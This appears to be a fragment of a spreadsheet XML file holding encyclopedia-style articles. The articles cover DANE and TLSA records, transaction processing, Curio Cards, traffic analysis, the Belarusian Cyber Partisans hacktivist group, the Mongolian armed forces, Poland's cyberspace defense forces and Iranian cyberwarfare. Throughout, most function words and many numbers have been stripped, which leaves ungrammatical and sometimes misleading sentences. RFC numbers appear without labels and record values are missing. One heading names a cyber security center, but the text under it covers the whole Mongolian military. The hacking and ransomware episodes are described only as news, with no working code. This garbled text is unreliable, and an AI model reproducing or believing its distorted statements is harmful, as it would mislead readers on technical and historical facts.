    <t>dns-based authentication named entities (dane) internet security protocol allow x.509 digital certificates, commonly used transport layer security (tls), bound domain names using domain name system security extensions (dnssec).it proposed 6698 authenticate client server entities without certificate authority (ca). updated operational deployment guidance 7671. application specific usage dane defined 7672 smtp 7673 using dane service (srv) records. rationale tls/ssl encryption currently based certificates issued certificate authorities (cas). within last years, number providers suffered serious security breaches, allowing issuance certificates well-known domains domains. trusting large number might problem breached could issue certificate domain name. dane enables administrator domain name certify keys used domain's clients servers storing domain name system (dns). dane needs records signed dnssec security model work. additionally dane allows domain owner specify allowed issue certificates particular resource, solves problem able issue certificates domain. dane solves similar problems certificate transparency ensuring rogue cannot issue certificates without permission domain holder without detected certification authority authorization limiting issue certificates given domainhowever, unlike dane, technologies wide support browsers. email encryption until recently, widely implemented standard encrypted email transfer. sending email security agnostic; scheme designate secure smtp. consequently, email delivered uses opportunistic encryption. since dnssec provides authenticated denial existence (allows resolver validate certain domain name exist), dane enables incremental transition verified, encrypted smtp without external mechanisms, described 7672. dane record indicates sender must tls.additionally, draft exists applying dane s/mime, 7929 standardises bindings openpgp. support applications google chrome support dane, since google chrome wishes eliminate 1024-bit within browser (dnssec previously used 1024-bit signed root, many zones still signed 1024-bit rsa, although modern default 256-bit ecdsa). according adam langley code written and, although chrome today, remains available add-on form. mozilla firefox (before version support add-on. privacy guard allows fetching keys openpgp dane (--auto-key-locate). option --export-options export-dane. (version 2.1.14) servers postfix powermta halon exim services posteo tutanota libraries openssl gnutls tlsa tlsa (resource record) service located name specifies certificate constraints applied services certain port. least tlsa must provide validation (path) certificate offered service specified address. protocols handle common name matching way. http requires common name x.509 certificate provided service matches regardless tlsa asserting validity. smtp require common name matches, certificate usage value (dane-ee), otherwise require common name match. important verify specific instructions protocol used. data fields fields data, describing level validation domain owner provides. certificate usage field selector field matching type field certificate association datae.g. _25._tcp.somehost.example.com. tlsa 0123456789abcdef certificate usage first field tlsa text specifies verify certificate. value commonly called constraint (and pkix-ta). certificate provided establishing must issued listed root-ca intermediate cas, valid certification path root-ca already trusted application verification. record point intermediate case certificate service must come entire chain trusted root-ca must still valid. value commonly called service certificate constraint (and pkix-ee). certificate used must match tlsa record, must also pass pkix certification path validation trusted root-ca. value commonly called trust anchor assertion (and dane-ta). tlsa record matches certificate root intermediate cas, certificate service. certification path must valid matching certificate, need trusted root-ca. value commonly called domain issued certificate (and dane-ee). tlsa record matches used certificate itself. used certificate need signed parties. this useful self-signed certificates, also cases validator list trusted root certificates. selector when connecting service certificate received, selector field specifies parts checked. value means select entire certificate matching. value means select public certificate matching. matching public often sufficient, likely unique. matching type type means entire information selected present certificate association data. type means sha-256 hash selected data. type means sha-512 hash selected data. certificate association data actual data matched given settings fields. this long "text string" hexadecimal data. examples tlsa record www.ietf.org specifies check sha-256 hash public certificate provided, ignoring _443._tcp.www.ietf.org. tlsa 0c72ac70b745ac19998811b131d662c9ac69dbdbe7cb23e5b514b56664c5d3d6 their mail service exact certificate tlsa. ietf.org. mail.ietf.org. _25._tcp.mail.ietf.org. tlsa 0c72ac70b745ac19998811b131d662c9ac69dbdbe7cb23e5b514b56664c5d3d6 finally, following example, others, hash calculation entire certificate. _25._tcp.mail.alice.example. tlsa ab9beb9919729f3239af08214c1ef6cca52d2dbae788bb5be834c13911292ed9 standards 6394 cases requirements dns-based authentication named entities (dane) 6698 dns-based authentication named entities (dane) transport layer security (tls) protocol: tlsa 7218 adding acronyms simplify conversations dns-based authentication named entities (dane) 7671 dns-based authentication named entities (dane) protocol: updates operational guidance 7672 smtp security opportunistic dns-based authentication named entities (dane) transport layer security (tls) 7673 using dns-based authentication named entities (dane) tlsa records records 7929 dns-based authentication named entities (dane) bindings openpgp 4255 using securely publish secure shell (ssh) fingerprints 8162 using secure associate certificates domain names s/mime draft: opportunistic encryption dane semantics ipsec: ipseca also certification authority authorization notes references external links dnssec unnecessary against dnssec dnssec rebuttal points "against dnssec" list dane test sites online tool check mail servers dnssec dane support illustrated dane advocacy links howtos tools</t>
  </si>
  <si>
    <t>Transaction processing</t>
  </si>
  <si>
    <t>transaction processing information processing computer science divided individual, indivisible operations called transactions. each transaction must succeed fail complete unit; never partially complete. example, purchase book online bookstore, exchange money form credit) book. credit good, series related operations ensures book bookstore gets money. however, single operation series fails exchange, entire exchange fails. book bookstore money. technology responsible making exchange balanced predictable called transaction processing. transactions ensure data-oriented resources permanently updated unless operations within transactional unit complete successfully. combining related operations unit either completely succeeds completely fails, simplify error recovery make one's application reliable. transaction processing systems consist computer hardware software hosting transaction-oriented application performs routine transactions necessary conduct business. examples include systems manage sales order entry, airline reservations, payroll, employee records, manufacturing, shipping. since most, though necessarily all, transaction processing today interactive, term often treated synonymous online transaction processing. description transaction processing designed maintain system's integrity (typically database modern filesystems) known, consistent state, ensuring interdependent operations system either completed successfully canceled successfully. example, consider typical banking transaction involves moving $700 customer's savings account customer's checking account. this transaction involves least separate operations computer terms: debiting savings account $700, crediting checking account $700. operation succeeds not, books bank balance day. there must, therefore, ensure either operations succeed fail never inconsistency bank's database whole. transaction processing links multiple individual operations single, indivisible transaction, ensures either operations transaction completed without error, none are. operations completed errors occur others attempted, transaction-processing system "rolls back" operations transaction (including successful ones), thereby erasing traces transaction restoring system consistent, known state processing transaction began. operations transaction completed successfully, transaction committed system, changes database made permanent; transaction cannot rolled back done. transaction processing guards hardware software errors might leave transaction partially completed. computer system crashes middle transaction, transaction processing system guarantees operations uncommitted transactions cancelled. generally, transactions issued concurrently. overlap (i.e. need touch portion database), create conflicts. example, customer mentioned example $150 savings account attempts transfer $100 different person time moving $100 checking account, succeed. however, forcing transactions processed sequentially inefficient. therefore, concurrent implementations transaction processing programmed guarantee result reflects conflict-free outcome, could reached executing transactions sequentially order property called serializability). example, means matter transaction issued first, either transfer different person move checking account succeeds, fails. methodology basic principles transaction-processing systems same. however, terminology vary transaction-processing system another, terms used necessarily universal. rollback transaction-processing systems ensure database integrity recording intermediate states database modified, using records restore database known state transaction cannot committed. example, copies information database prior modification transaction aside system transaction make modifications (this sometimes called image). part transaction fails committed, copies used restore database state transaction began. rollforward also possible keep separate journal modifications database management system. (sometimes called images). this required rollback failed transactions useful updating database management system event database failure, transaction-processing systems provide database management system fails entirely, must restored recent back-up. back-up reflect transactions committed since back-up made. however, database management system restored, journal images applied database (rollforward) bring database management system date. transactions progress time failure rolled back. result database consistent, known state includes results transactions committed moment failure. deadlocks cases, transactions may, course processing, attempt access portion database time, prevents proceeding. example, transaction access portion database, transaction access portion database. point, transaction tries access portion database transaction tries access portion deadlock occurs, neither transaction move forward. transaction-processing systems designed detect deadlocks occur. typically transactions cancelled rolled back, started different order, automatically, deadlock occur again. sometimes, deadlocked transactions cancelled, rolled back, automatically restarted short delay. deadlocks also occur among three transactions. transactions involved, difficult detect, point transaction processing systems find practical limit deadlocks detect. compensating transaction systems commit rollback mechanisms available undesirable, compensating transaction often used undo failed transactions restore system previous state. acid criteria gray defined properties reliable transaction system late 1970s acronym acid atomicity, consistency, isolation, durability. atomicity transaction's changes state atomic: either happen none happen. these changes include database changes, messages, actions transducers. consistency consistency: transaction correct transformation state. actions taken group violate integrity constraints associated state. isolation even though transactions execute concurrently, appears transaction others executed either both. durability once transaction completes successfully (commits), changes database survive failures retain changes. benefits transaction processing benefits: allows sharing computer resources among many users shifts time processing computing resources less busy avoids idling computing resources without minute-by-minute human interaction supervision used expensive classes computers help amortize cost keeping high rates utilization expensive resources disadvantages they relatively expensive setup costs there lack standard formats hardware software incompatibility implementations standard transaction-processing software, ibm's information management system, first developed 1960s, often closely coupled particular database management systems. client–server computing implemented similar principles 1980s mixed success. however, recent years, distributed client–server model become considerably difficult maintain. number transactions grew response various online services (especially web), single distributed database practical solution. addition, online systems consist whole suite programs operating together, opposed strict client–server model single server could handle transaction processing. today number transaction processing systems available work inter-program level scale large systems, including mainframes. effort x/open distributed transaction processing (dtp) (see also java transaction (jta). however, proprietary transaction-processing environments ibm's cics still popular, although cics evolved include open industry standards well. term extreme transaction processing (xtp) used describe transaction processing systems uncommonly challenging requirements, particularly throughput requirements (transactions second). such systems implemented distributed cluster style architectures. used least 2011. references further reading gerhard weikum, gottfried vossen, transactional information systems: theory, algorithms, practice concurrency control recovery, morgan kaufmann, 2002, isbn 1-55860-508-8 gray, andreas reuter, transaction processing concepts techniques, 1993, morgan kaufmann, isbn 1-55860-190-2 philip bernstein, eric newcomer, principles transaction processing, 1997, morgan kaufmann, isbn 1-55860-415-4 ahmed elmagarmid (editor), transaction models advanced database applications, morgan-kaufmann, 1992, isbn 1-55860-214-3 external links nuts bolts transaction processing (1999) managing transaction processing database integrity transaction processing</t>
  </si>
  <si>
    <t>Curio Cards</t>
  </si>
  <si>
    <t>curio cards collectible digital artworks located ethereum blockchain. created 2017, curio cards commonly viewed first digital collectibles ethereum blockchain. october 2021, complete collection curio cards, including card "17b" misprint, sold eth393 ($1,267,320) christie's post-war present auction. background curio cards concept, developed travis uhrig, thomas hunt, rhett creighton, launched 2017. curio cards feature multiple sets unique cards profile artwork different artists. curio cards colloquially considered first collection artworks ethereum blockchain. october 2021, complete collection curio cards, including digital misprint "17b", sold anonymous seller $1.2 million christie's post-war present auction held york. this first christie's auction bidding conducted solely using ethereum cryptocurrency. also list expensive non-fungible tokens cryptopunks references</t>
  </si>
  <si>
    <t>Traffic analysis</t>
  </si>
  <si>
    <t>traffic analysis process intercepting examining messages order deduce information patterns communication, performed even messages encrypted. general, greater number messages observed, information inferred. traffic analysis performed context military intelligence, counter-intelligence, pattern-of-life analysis, concern computer security. traffic analysis tasks supported dedicated computer software programs. advanced traffic analysis techniques include various forms social network analysis. traffic analysis historically vital technique cryptanalysis, especially attempted crack depends successfully seeding known-plaintext attack, often requires inspired guess based specific operational context might likely influence adversary communicates, sufficient establish short crib. breaking anonymity networks traffic analysis method used break anonymity anonymous networks, e.g., tors. there methods traffic-analysis attack, passive active. passive traffic-analysis method, attacker extracts features traffic specific flow side network looks features side network. active traffic-analysis method, attacker alters timings packets flow according specific pattern looks pattern side network; therefore, attacker link flows side side network break anonymity shown, although timing noise added packets, active traffic analysis methods robust noise. military intelligence military context, traffic analysis basic part signals intelligence, source information intentions actions target. representative patterns include: frequent communications denote planning rapid, short communications denote negotiations lack communication indicate lack activity, completion finalized plan frequent communication specific stations central station highlight chain command talks indicate stations charge' 'control station' particular network. this implies something personnel associated station talks indicate stations active connection events, implies something information passed perhaps something personnel/access associated stations changes station station, medium medium indicate movement, fear interceptionthere close relationship traffic analysis cryptanalysis (commonly called codebreaking). callsigns addresses frequently encrypted, requiring assistance identifying them. traffic volume often sign addressee's importance, giving hints pending objectives movements cryptanalysts. traffic flow security traffic-flow security measures conceal presence properties valid messages network prevent traffic analysis. this done operational procedures protection resulting features inherent cryptographic equipment. techniques used include: changing radio callsigns frequently encryption message's sending receiving addresses (codress messages) causing circuit appear busy times much time sending dummy traffic sending continuous encrypted signal, whether traffic transmitted. this also called masking link encryption.traffic-flow security aspect communications security. comint metadata analysis communications' metadata intelligence, comint metadata term communications intelligence (comint) referring concept producing intelligence analyzing technical metadata, hence, great practical example traffic analysis intelligence.while traditionally information gathering comint derived intercepting transmissions, tapping target's communications monitoring content conversations, metadata intelligence based content technical communicational data. non-content comint usually used deduce information user certain transmitter, locations, contacts, activity volume, routine exceptions. examples example, emitter known radio transmitter certain unit, using direction finding (df) tools, position emitter locatable, change locations point another deduced, without listening orders reports. unit reports back command certain pattern, another unit reports pattern command, units probably related, conclusion based metadata units' transmissions, content transmissions. using all, much metadata available commonly used build electronic order battle (eob) mapping different entities battlefield connections. course could built tapping conversations trying understand unit where, using metadata automatic analysis tool enables much faster accurate build-up alongside tapping builds much better complete picture. world british analysts world noticed call sign german vice admiral reinhard scheer, commanding hostile fleet, transferred land station. admiral fleet beatty, ignorant scheer's practice changing callsigns upon leaving harbor, dismissed importance disregarded room analysts' attempts make point. german fleet sortied, british late meeting battle jutland. traffic analysis taken seriously, british might done better "draw". french military intelligence, shaped kerckhoffs's legacy, erected network intercept stations western front pre-war times. when germans crossed frontier, french worked crude means direction-finding based intercepted signal intensity. recording call-signs volume traffic enabled identify german combat groups distinguish fast-moving cavalry slower infantry. world early world aircraft carrier glorious evacuating pilots planes norway. traffic analysis produced indications scharnhorst gneisenau moving north sea, admiralty dismissed report unproven. captain glorious keep sufficient lookout, subsequently surprised sunk. harry hinsley, young bletchley park liaison admiralty, later said reports traffic analysts taken much seriously thereafter. during planning rehearsal attack pearl harbor, little traffic passed radio, subject interception. ships, units, commands involved japan touch phone, courier, signal lamp, even flag. none traffic intercepted, could analyzed. espionage effort pearl harbor december send unusual number messages; japanese vessels regularly called hawaii messages carried aboard consular personnel. least vessel carried japanese navy intelligence officers. such messages cannot analyzed. suggested, however, volume diplomatic traffic certain consular stations might indicated places interest japan, might thus suggested locations concentrate traffic analysis decryption efforts. admiral nagumo's pearl harbor attack force sailed radio silence, radios physically locked down. unclear deceived u.s.; pacific fleet intelligence unable locate japanese carriers days immediately preceding attack pearl harbor. japanese navy played radio games inhibit traffic analysis (see examples, below) attack force sailed late november. radio operators normally assigned carriers, characteristic morse code "fist", transmitted inland japanese waters, suggesting carriers still near japan. operation quicksilver, part british deception plan invasion normandy world german intelligence combination true false information troop deployments britain, causing germans deduce order battle suggested invasion pas-de-calais instead normandy. fictitious divisions created deception supplied real radio units, maintained flow messages consistent deception. computer security traffic analysis also concern computer security. attacker gain important information monitoring frequency timing network packets. timing attack protocol timing information deduce information passwords since, interactive session, transmits keystroke message. time keystroke messages studied using hidden markov models. song, claim recover password fifty times faster brute force attack. onion routing systems used gain anonymity. traffic analysis used attack anonymous communication systems like anonymity network. adam back, möeller anton stiglic present traffic analysis attacks anonymity providing systems steven murdoch george danezis university cambridge presented research showing traffic-analysis allows adversaries infer nodes relay anonymous streams. this reduces anonymity provided tor. they shown otherwise unrelated streams linked back initiator. remailer systems also attacked traffic analysis. message observed going remailing server, identical-length anonymized) message seen exiting server soon after, traffic analyst able (automatically) connect sender ultimate receiver. variations remailer operations exist make traffic analysis less effective. countermeasures difficult defeat traffic analysis without encrypting messages masking channel. when actual messages sent, channel masked sending dummy traffic, similar encrypted traffic, thereby keeping bandwidth usage constant hard hide information size timing messages. known solutions require alice send continuous stream messages maximum bandwidth ever use...this might acceptable military applications, civilian applications." military-versus-civilian problems applies situations user charged volume information sent. even internet access, per-packet charge, isps make statistical assumption connections user sites busy 100% time. user cannot simply increase bandwidth link, since masking would fill well. masking, often built end-to-end encryptors, becomes common practice, isps change traffic assumptions. also chatter (signals intelligence) data warehouse echelon electronic order battle elint pattern-of-life analysis sigint social network analysis telecommunications data retention zendian problem references ferguson, niels; schneier, bruce (2003). practical cryptography. 114. isbn 0-471-22357-3. wang chen jajodia (november 2005). "tracking anonymous peer-to-peer voip calls internet" (pdf). proceedings 12th conference computer communications security (ccs 2005). archived original (pdf) 2006-08-30. sweden multi-source data fusion nato coalition operations further reading http://www.cyber-rights.org/interception/stoa/interception_capabilities_2000.htm study duncan campbell https://web.archive.org/web/20070713232218/http://www.onr.navy.mil/02/baa/docs/07-026_07_026_industry_briefing.pdf selected papers anonymity free haven</t>
  </si>
  <si>
    <t>Trading up the chain</t>
  </si>
  <si>
    <t>trading chain marketing propaganda tactic deliberately inducing circular reporting, seeding message claim less-credible medium, intent quoted repeated publications people) appeal wider audience. those more-authoritative sources cited, build message's credibility publicize further. trading chain tactic disinformation media manipulation.the term publicized author marketer ryan holiday, described marketing politics. also information laundering argument authority disinformation astroturfing references</t>
  </si>
  <si>
    <t>Cyber Partisans</t>
  </si>
  <si>
    <t>cyber partisans (belarusian: кіберпартызаны, russian: киберпартизаны) belarusian decentralized anonymous activist/hacktivist collective emerged september 2020, known various cyber attacks authoritarian belarusian government. group part broader belarusian opposition movement. membership aims cyber partisans consists group belarusian workers live abroad. august 2021 interview bloomberg, hackers shared details themselves: people, none professional hackers; them, perform hacks, others deal analysis obtained data; group members penetration testers joining group. members anonymous even other. group describes activities ethical hacking, goes state harm ordinary citizens. late january 2022, group reportedly consisted people. spokesperson, yuliana shemetovets, based york.an anonymous spokesperson group told interview technology review: "what want stop violence repression terroristic regime belarus bring country back democratic principles rule law." 2021 2022, group affirmed collaborating foreign government, long aligns depicted goals, change regime." history actions cyber partisans originated september 2020 2020 belarusian presidential election subsequent protests falsification alexander lukashenko. protests brutally suppressed government's police security forces.initially, actions group symbolic: group members hacked state news websites (all-national belarus-1) streamed videos showing scenes police brutality, inserted names lukashenko minister internal affairs, yury karayeu, police wanted list. group also hacked government websites white-red-white flag, favored belarusian dissidents, official green flag country.cyber partisans work together bypol group, consists former belarusian police officers working lukashenko's government. their knowledge database structure helps plan execute partisans' moves.in july 2021, cyber partisans hacked ministry internal affairs' sensitive databases. group obtained large volume material, includes archive almost million minutes secretly recorded phone conversation audio; lists alleged police informants; personal information government officials; video footage gathered police drones detention centers. group also obtained databases passports, registered motor vehicles, recordings cameras okrestina prison's isolation cells, mortality statistics. group shared data journalists calculated excess mortality covid-19 pandemic belarus. they concluded march 2020 march 2021, figure 32,000 people, 14.4 times authorities reported. group published passport data lukashenko sons prove really hacked database. authenticity data also demonstrated data journalists current time partisans provided current time outlet's request prove veracity leak.during 2022 russian invasion ukraine, cyber partisans three main belarusian dissident groups worked stymie belarusian involvement russian invasion, specifically targeting railroad supply lines. (the groups belarusian railway workers defectors government's security forces). cyber partisans launched first attack railway's systems late january 2022, days immediately invasion slowing movement russian troops crossed border. group said penetrated belarusian railway's network system previous month, december 2021. spokesperson cyber partisans said railway company's system vulnerable outdated windows operating system. group used modified form ransomware paralyze railway system, saying would return computer network normal belarusian government released political prisoners need medical treatment stopped russian forces entering belarus. partisans hacked encrypted internal databases railway. group targeted freight rail disrupt russian military movements cargo bound china; group said deliberately avoided affecting passenger rail.the group also obtained access database border crossing records. prove group members provided guardian journalist full list travel records belarus going back 2016". cyber partisans provided border entry exit data independent investigative journalism group bellingcat. response lukashenko regime speech state july 2021, head belarusian ivan tertel blamed "foreign special services" cyberattacks government targets.in 2021, belarusian government (through belarusian supreme court ministry internal affairs) declared information resources cyber-partizans, subsidiary project cyber-leaks, telegram channels "extremist" organisations. creating participating group crime belarus. reactions analysis anthropologist gabriella coleman, professor mcgill university expert hacktivism anonymous, commented bloomberg: think parallels this, sophisticated attacking multiple levels, it’s something i’ve seen except movies.”according associate professor tetyana lokot dublin city university, specializes protest digital rights issues eastern europe, ever lukashenko ends facing prosecution international criminal court, example, records going incredibly important.”the group praised belarusian opposition, including franak viačorka, senior adviser exiled opposition leader sviatlana tsikhanouskaya. andrei sannikov, former belarusian diplomat candidate 2010 presidential election belarus, interview technology review said "they’re making regime’s crimes transparent. information they’re getting hacking state really eloquent witnessing criminal activities regime citizens."the group subject radio series digital human episode aired march 2022. references external links gallagher, ryan ragtag band hackers waging cyberwar putin’s supply lines bloomberg (june 2022)</t>
  </si>
  <si>
    <t>Cyber Security Center of the Mongolian Armed Forces</t>
  </si>
  <si>
    <t>mongolian armed forces (mongolian: монгол улсын зэвсэгт хүчин; mongol: ulsyn zevsegt hüchin) collective name mongolian military joint forces comprise tasked protecting independence, sovereignty, territorial integrity mongolia. defined peacetime configuration, current structure consists five branches: mongolian ground force, mongolian force, construction engineering forces, cyber security, special forces. case situation, border troops, internal troops national emergency management agency reorganized armed forces structure. general staff mongolian armed forces main managing body operates independently ministry defence, government controlled parent body.the official holiday military men's soldiers' цэргийн баяр, эрчүүдийн баяр) march, equivalent defender fatherland russia china. history period qing rule once mongolia qing, mongol armies used defeat ming dynasty, helping consolidate manchu rule. mongols proved useful ally war, lending expertise cavalry archers. during qing dynasty time, mongols gave military assistance manchus.with creation eight banners, banner armies broadly divided along ethnic lines, namely manchu mongol. bogd khanate (1911–1919) 1911, outer mongolia declared independence bogd khaanate bogd khan. this initial independence last, mongolia occupied successively chinese beiyang government, baron ungern's white russian forces. modern precursor mongolian armed forces placed, men's conscription permanent military structure starting 1912. mongolian people's republic with independence lost foreign forces, newly created mongolian people's revolutionary party created native communist army 1920 leadership damdin sükhbaatar order fight russian troops white movement chinese forces. mprp aided army, helped secure mongolian people's republic remained territory least 1925. however, 1932 armed uprising mongolia initial japanese border probes beginning mid-1930s, soviet army troops mongolia amounted little instructors native army guards diplomatic trading installations. battles khalkhin battles khalkhin began 1939. mongolian cavalry unit 70–90 entered disputed area search grazing horses. day, manchukuoan cavalry attacked mongolians drove back across khalkhin gol. may, mongolian force returned greater numbers manchukoans unable dislodge them. may, col. yaozo azuma reconnaissance regiment 23rd infantry division, supported 64th infantry regiment division, colonel takemitsu yamagata, territory mongolians withdrew. soviet mongolian troops returned disputed region, however, azuma's force moved evict them. this time things turned differently, soviet–mongolian forces surrounded azuma's force destroyed azuma force suffered eight officers killed officer wounded, total casualties. commander soviet forces east front comandarm grigory shtern 1938.both sides began building forces area: soon japan 30,000 theater. soviets dispatched corps commander, comcor georgy zhukov, arrived june brought motorized armored forces army group) combat zone. accompanying zhukov comcor yakov smushkevich aviation unit. zhamyangiyn lhagvasuren, corps commissar mongolian people's revolutionary army, appointed zhukov's deputy. battles khalkhin ended september 1939. world immediate aftermath beginning stage world mongolian people's army involved battle khalkhin gol, japanese forces, together puppet state manchukuo, attempted invade mongolia khalkha river. soviet forces command georgy zhukov, together mongolian forces, defeated japanese sixth army effectively ended soviet–japanese border wars. 1945, mongolian forces participated soviet invasion manchuria command army, among last engagements world soviet–mongolian cavalry mechanized group issa pliyev took part part soviet transbaikal front. mongolian troops numbered four cavalry divisions three regiments. during 1946–1948, mongolian people's army successfully repelled attacks kuomintang's regiment kazakh allies border mongolia xinjiang. attacks propagated rebellion, soviet-backed revolt second east turkestan republic kuomintang government republic china. this little-known border dispute mongolia republic china became known pei-ta-shan incident. these engagements would last active battles mongolian army would see, democratic revolution. after democratic revolution mongolia underwent democratic revolution 1990, ending communist one-party state existed since early 1920s. 2002, passed enabled mongolian army police forces conduct un-backed international peacekeeping missions abroad. august 2003, mongolia contributed troops iraq part multi-national force iraq. mongolian troops, numbering peak, multinational division central-south tasked guarding main polish base, camp echo. prior posting, protecting logistics base dubbed camp charlie hillah.then-chairman joint chiefs staff, general richard myers, visited ulan baator january 2004 expressed appreciation deployment 173-strong contingent iraq. inspected 150th peacekeeping battalion, planned send fresh force replace first contingent later january 2004. troops withdrawn september 2008.in june 2005, batzorigiyn erdenebat, vice minister national defence, told jane's defence weekly deployment forces mongolia changing away cold war, southern-orientated china posture. "under mongolia's regional development concept country divided four regions, incorporating several provinces. largest capital city region become regional centre establish regional military headquarters cities," said. however, time, implementation delayed.in 2009, mongolia sent troops part international security assistance force afghanistan. troops sent, backing u.s. surge troop numbers. mongolian forces afghanistan mostly assist nato/international security assistance force personnel training former warsaw pact weapons comprise bulk military equipment available afghan national army. 2021, occasion 100th anniversary armed forces, awarded order genghis khan president khaltmaagiin battulga. peacekeeping missions mongolian armed forces performing peacekeeping missions south sudan, chad, georgia, ethiopia, eritrea, congo, western sahara, sudan (darfur), iraq, afghanistan, sierra leone mandate united nations mission liberia. 2005/2006, mongolian troops also served part belgian kfor contingent kosovo. from 2009 2010 mongolian armed forces deployed largest peace keeping mission chad completed mission successfully. 2011, government decided deploy first fully self-sustained forces united nations mission unmiss south sudan. since mongolian infantry battalion conducting tasks unity state republic south sudan. addition, mongolian staff officers deployed force headquarter sector headquarters unmiss mission. first general officer deployed mission brigade commander 2014. november 2009, deputy assistant secretary defense partnership strategy stability operations, james schear lunch col. ontsgoibayar selected troops 150th peacekeeping battalion command, bound chad november 2009. afterwards schear visited five hills regional training center, hosts numerous combined multinational training opportunities peacekeepers. other peacekeeping battalions mongolian forces include 084th special task battalion, 330th 350th special task battalion. historical mongolian naval forces historically, mongolian navy largest world, time kublai khan. however, fleet sank mongol invasions japan. mongolian navy recreated 1930s, soviet rule, using transport oil. 1990, mongolian navy consisted single vessel, sukhbaatar iii, stationed lake khövsgöl, nation’s largest body water volume. navy made men, meant smallest navy world time. 1997, navy privatized, offered tours lake cover expenses. currently, mongolia official navy, small border patrols buir lake, patrolling border mongolia china lake. military policy mongolia unique military policy geopolitical position economic situation. being world's largest nations, mongolian armed forces limited capability protect independence foreign invasions; country's national security therefore depends strongly diplomacy, notable part third neighbor policy. country's military ideal create maintain small efficient professional armed forces. organization higher leadership military order precedence follows: president mongolia (commander-in-chief) minister defense deputy ministers defense chief general staff armed forces deputy chiefs general staff armed forces service branch commanders branches ground force ground forces possess tanks, infantry fighting vehicles armored personnel carriers, mobile anti-aircraft weapons, artillery mortar military equipment. most soviet union models designed late 1950s early 1980s. there smaller number newer models designed post-soviet russia. force 1925 junkers f.13 entered service first aircraft mongolian civil military aviation. 1935 soviet aircraft based country. 1937 force renamed mongolian people's republic corps. during 1939–1945 soviets delivered polikarpov i-15s, polikarpov i-16s, yak-9s ilyushin il-2s. 1966 first sa-2 units entered service, force renamed force mongolian people's republic. mig-15, mig-17 first combat aircraft mongolian inventory, entered service 1970 mid-1970s joined mig-21s, mi-8s ka-26s. after cold advent democratic revolution, force effectively grounded lack fuel spare parts. however, government trying revive force since 2001. country goal developing full force future.in 2011, ministry defense announced would mig-29s russia year, materialize. october 2012 ministry defense returned loaned airbus a310-300 miat mongolian airlines. from 2007 2011 active fleet mig-21s reduced. 2013 force examined possibility buying three c-130j transport airplanes, manufactured lockheed martin. left without russian aid, mongolian force inventory gradually reduced antonov an-24/26 tactical airlifters dozen airworthy mi-24 mi-8 helicopters.on november 2019 russia donated mig-29 fighter aircraft mongolia, became combat-capable fighter jets force. construction engineering forces since 1963, large-scale construction work military affair, council ministers january 1964 establishing general construction military agency ministry defense. addition, large number construction military units established. work create construction engineering army began 2010. ministry defense general staff armed forces established civil engineering units last years. cyber security forces armed forces cyber security center established general staff armed forces. project upgrade armed forces' information communication network, conduct integrated monitoring, detect cyber attacks, install response equipment expected completed august 2021. decision made build data center armed forces' cyber security center. this basis creation cyber security force. special forces special forces (mongolian: тусгай хүчин) mongolia 084th special task battalion. personnel military education october 1943, sukhe-bator officers' school opened train personnel mongolian army accordance experience army second world war. national defense university serves main educational institution armed forces. composed following education institutions: defense management academy, defense research institute, academic education institute, military institute, military music college, college. 1994, mndu maintained border protection faculty, would later expanded establish border troops institute would later become enforcement university mongolia. conscription legal basis conscription universal military service act. conscripted ages one-year tour duty. mongolian receive conscription notices local administrative unit. reserve service still required women armed forces more percent total personnel armed forces females, work mainly communications, logistics medical sectors. addition, female members armed forces active peacekeeping operations. major nyamjargal first female member armed forces serve un-mandated military observer western sahara 2007. total women served western sahara sierra leone.policies recent years aimed making female military service equitable. most women assigned duties kitchen facilities barracks, subject many gender inequalities. military courts march 1921, joint meeting provisional people's government members central committee mprp decided establish "military judicial office ministry defense". 1928, government approved “charter army judiciary” military judiciary established ministry justice. this disbanded year later military college supreme court established. composed khovd regional military court, eastern military court, military courts cavalry division (ulaanbaatar). military court referred "special courts" time dealt criminal civil cases involving military personnel. 1929, provisional court general military court dissolved, military college supreme court subordinated three former military units. military college dissolved 1954, re-established 1971. connection change staffing, parliament ordered 1993 abolition all-military special court special military court first instance, transferring assets used military courts general council judiciary. activities military court system supervised military collegium. equipment fishing boat, armed 12.7mm kord machine gun. references this article incorporates public domain material world factbook website https://www.cia.gov/the-world-factbook/. world aircraft information files bright star publishing london file sheet external links media related military mongolia wikimedia commons general staff mongolian armed forces mongolian) ministry defense mongolian) general intelligence agency photo report military parade honor national flag mongolia, 2011</t>
  </si>
  <si>
    <t>Cyberspace Defense Forces</t>
  </si>
  <si>
    <t>cyberspace defense forces (polish: wojska obrony cyberprzestrzeni) specialized component polish armed forces established february 2022 minister national defense, mariusz błaszczak warsaw. creation day, february symbolic safer internet day.the unit deal cyber-security republic poland military dimension. unit cooperates national cyberspace security center. march 2022 defense fatherland mentions art. sec. point cyberspace defense forces, defining specialized component armed forces.at launch ceremony military university technology, ministry national defence, mariusz błaszczak, said, 2016 nato announced cyberspace another domain article [the collective defence clause north atlantic treaty] could activated. part regular army, reconnaissance, defence, offensive capabilities.” also cyber information domain service (germany) norwegian cyber defence force references</t>
  </si>
  <si>
    <t>Cyberwarfare and Iran</t>
  </si>
  <si>
    <t>cyberwarfare part iran's "soft war" military strategy. being victim wager cyberwarfare, iran considered emerging military power field.since november 2010, organization called "the cyber defense command" (persian: قرارگاه دفاع سایبری; gharargah-e defa-e saiberi) operating iran supervision country's "passive civil defense organization" (persian: سازمان پدافند غیرعامل; sazeman-e padafand-e gheyr-e amel) subdivision joint staff iranian armed forces.according 2014 report institute national security studies, iran "one active players international cyber arena". 2013, revolutionary guards general stated iran "the biggest cyber power among world's cyber armies."according 2021 report cyber-security company, "iran running surveillance operations cyber-space, targeting 1,000 dissidents". iranian cyber defense system digital fortress part national information network (national internet) developed thwarting attacks engage attackers. attacks iran june 2010, iran victim cyber-attack nuclear facility natanz infiltrated cyber-worm 'stuxnet'. reportedly combined effort united states israel, stuxnet destroyed perhaps 1,000 nuclear centrifuges and, according business insider article, "[set] tehran's atomic programme back least years." worm spread beyond plant allegedly infect 60,000 computers, government iran indicates caused significant damage. iran crowdsourced solutions worm purportedly better positioned terms cyber warfare technology. government claimed responsibility worm. cyber-worm also used north korea. events october 2013, media reported mojtaba ahmadi, served commander "cyber headquarters" found dead wounded bullets karaj. november 2018: iranian telecommunication minister mohammad-javad azari jahromi accuses israel failed cyberattack telecommunications infrastructure, vows respond legal action. october 2021: attack paralyzed stations across country, preventing users purchasing fuel using state-issued cards digital billboards displayed antigovernment messages attacks iran iranian government accused western analysts cyber-attacks united states, israel persian gulf arab countries, denied this, including specific allegations 2012 involvement hacking american banks. conflict iran united states called "history's first known cyber-war" michael joseph gross mid-2013. events august 2014: official told press iran launched numerous significant attacks israel's internet 